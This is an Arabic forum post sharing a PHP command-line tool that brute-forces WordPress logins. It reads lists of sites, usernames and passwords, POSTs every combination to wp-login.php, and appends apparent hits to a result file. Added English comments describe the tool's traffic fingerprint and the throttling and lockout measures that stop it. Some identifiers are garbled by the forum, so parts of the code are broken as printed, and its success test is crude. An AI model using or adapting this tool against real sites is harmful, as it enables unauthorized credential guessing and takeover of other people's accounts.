al-swisre | 09-26-2012 12:48 AM | اداة تخمين على الوردبريس - Wordpress Brute Forcer السلام عليكم ورحمة الله وبركاته
اداة لتخمين الوردبريس تحتاج فقط الى مترجم php
تعطيها لستة مواقع ولستة يوزرات وأيضا لستة الباسوردات. شرح الأداة على اليوتيوب كود PHP: <?php
/*
author..............: s3n4t00r home................: sec-w.com & v99x.com twitter.............: @al_swisre tool name...........: wsec_wp v1.0 Demonstration ......: http://goo.gl/vots5
*/
// Entry script. It requires the cURL extension, turns PHP error reporting off, removes the
// execution time limit, and instantiates the class declared further down this listing.
// NOTE(review): sequences such as `***91;` / `***93;` and runs of asterisks are reproduced
// exactly as they appear on the page (the forum software appears to have altered them);
// they are left untouched here.
if (!extension_loaded('curl')) die("cURL extension required\n"); error_reporting(0); set_time_limit(0); $wp_crack = new s3n4t00r_wp_cracker();
// Banner text followed by the first interactive prompt ("list site").
print_r("\n
.oPYo. .8 o .oPYo. .oPYo. `8 d'8 8 8 .o8 8 .o8 .oPYo. .oP' odYo. d' 8 o8P 8 .P'8 8 .P'8 oPYo. Yb.. `b. 8' `8 Pooooo 8 8.d' 8 8.d' 8 8 `' 'Yb. :8 8 8 8 8 8o' 8 8o' 8 8 `YooP' `YooP' 8 8 8 8 `YooP' `YooP' 8 :.....::.....:..::..::::..:::..::.....::.....:..:::: :::::::::::::::::::::::::::::::::::::::::::::::::::: ::::::::::::::::::::::::::::::::::::::::::::::::::::
\n\n # Programmer : s3n4t00r | @al_swisre
# Home : Sec-w.com & V99x.com
# Greets 4 : Exp-Bl00d - Saudi Eagle
\n***91;****93; list site (1/3) :");
// Three file paths are read from stdin, one per prompt: the host list, the user list and
// the password list. The third prompt is labelled "(2/3)" in the original text.
$file_host = $wp_crack->stdin();
echo "\n\n***91;****93; list user (2/3) :";
$file_user = $wp_crack->stdin();
echo "\n\n***91;****93; list pass (2/3) :";
$file_pass = $wp_crack->stdin();
// cracker() ends with `return true`, so once it returns the script terminates with the
// message below.
$crack = $wp_crack->cracker($file_host,$file_user,$file_pass);
if($crack){die('# END Brute Forcer - S3n4t00r');}
/**
 * Password-guessing client for the WordPress login form, as posted by the author.
 *
 * Defender notes, derived from the code in this class:
 * - Traffic pattern: one header fetch of http://<host>/wp-login.php per host, then one
 *   POST to the same path for every user/password pair, all over plain HTTP.
 * - Every POST carries the same hard-coded MSIE 7.0 User-Agent string and the form
 *   fields log, pwd, rememberme=forever and wp-submit, so the traffic is easy to
 *   fingerprint in web-server or WAF logs.
 * - No delay or back-off between attempts is visible, so per-account and per-IP login
 *   throttling or lockout, and a second factor on wp-login.php, directly limit it.
 * - Hits are appended in clear text to wp_result.txt in the working directory, and every
 *   attempt is echoed to the console; both are artefacts to look for during forensics.
 */
class s3n4t00r_wp_cracker{
/**
 * Reads the three list files and walks every host / user / password combination.
 *
 * @param string $file_host Path to the host list (split on "\n").
 * @param string $file_user Path to the user list (split on "\n").
 * @param string $file_pass Path to the password list (split on "\n").
 * @return bool Always true; the script dies earlier if a list cannot be read.
 */
public function cracker($file_host,$file_user,$file_pass){
// `or die` fires when file_get_contents() returns false and also when the content is
// falsy (an empty file, or a file containing only "0").
$list_host = file_get_contents($file_host) or die ("\n WTF list host not found ?");
$list_user = file_get_contents($file_user) or die (" \n WTF list user not found ? \n");
$list_pass = file_get_contents($file_pass) or die (" \n WTF list pass not found ? \n");
// Lists are split on "\n" only; entries are trimmed later, inside the innermost loop.
$exp_host = explode("\n",$list_host);
$exp_user = explode("\n",$list_user);
$exp_pass = explode("\n",$list_pass);
$c_host = count($exp_host);
$c_user = count($exp_user);
$c_pass = count($exp_pass);
// Summary of the three input files and their entry counts.
echo " |=================================================+ | Host : $file_host - ($c_host) | | Username : $file_user - ($c_user) | | Password : $file_pass - ($c_pass) | | Start Brute Forcer > > > |=================================================+ \n"; flush();
foreach ($exp_host as $host){
// A leading "http://" is stripped because the scheme is re-added when URLs are built.
$host = str_replace('http://','',trim($host));
// Reachability probe: headers of the login page are fetched before any guessing starts.
$get = get_headers("http://$host/wp-login.php");
// Hosts whose status line does not contain "200 OK" are skipped. The flush() after
// `continue` can never run.
if(!preg_match("/200 OK/",$get***91;0***93;)){continue; flush(); }
foreach($exp_user as $user) {
flush();
foreach($exp_pass as $pass){
flush();
$host = trim($host); $user = trim($user); $pass = trim($pass);
// Each attempt, including the candidate password, is written to standard output.
echo "***91;-***93; Testing -> $host:$user:$pass \n";
$login = $this->login($host,$user,$pass);
// On a reported hit the triple is printed and handed to save(); the loops keep going
// afterwards rather than stopping at the first hit for a user.
if($login){echo "\n ***91;+***93; Found : $host:$user:$pass \n\n";
$this->save($host,$user,$pass);
flush(); }else{continue;}
flush(); } flush();
} flush();
}
return true;
}
/**
 * Sends one login POST to http://<host>/wp-login.php and classifies the response.
 *
 * @param string $host Host name without scheme.
 * @param string $user Candidate user name.
 * @param string $pass Candidate password.
 * @return bool True when a non-empty response body does not contain the string "ERROR"
 *              (case-sensitive); false otherwise.
 */
private function login($host,$user,$pass){
// Request set-up: form POST, redirects followed, body returned as a string, fixed
// User-Agent. NOTE(review): the asterisk runs in the field name and in two option
// constants are as shown on the page and are not valid identifiers as printed.
$curl = curl_init(); curl_setopt($curl, CURLOPT_POST, 1); curl_setopt($curl, CURLOPT_POSTFIELDS,"log=$user&pwd=$pass&rememberme=forever&wp-submit=Log In&test******=1"); curl_setopt($curl, CURLOPT_URL,"http://".$host."/wp-login.php"); curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1); curl_setopt($curl, CURLOPT_HEADER,0); curl_setopt($curl, CURLOPT_VERBOSE,0); curl_setopt($curl, CURLOPT_RETURNTRANSFER,1); curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)'); curl_setopt($curl, CURLOPT_******JAR,"******.txt"); curl_setopt($curl, CURLOPT_******FILE,"******.txt"); $ex = curl_exec($curl);
// Success is inferred only from the absence of "ERROR" in the body, not from a session or
// a redirect target. Any other page without that string (a block page, a localized error)
// is therefore reported as a hit, so entries in a recovered result file are unconfirmed.
if($ex){
if(!preg_match('/ERROR/',$ex)){
curl_close($curl);
return true;
}
}
curl_close($curl);
return false;
}
/**
 * Appends one host / user / password record to wp_result.txt in the working directory.
 *
 * @return bool|null True when fwrite() reports bytes written; otherwise the method falls
 *                   off the end and yields null. No fclose() call is visible here.
 */
private function save($host,$user,$pass){
$f = fopen('wp_result.txt','ab'); $w = fwrite($f,"***91;$host***93; - ***91;$user***93; - ***91;$pass) \n \n"); if($w){return true;}
}
/**
 * Reads a single line from standard input and returns it trimmed.
 *
 * @return string The line with surrounding whitespace removed.
 */
public function stdin(){ $fp = fopen("php://stdin","r"); $line = trim(fgets($fp)); fclose($fp); return $line; }
//end class }
?> الحقوق لـ عالم الحماية |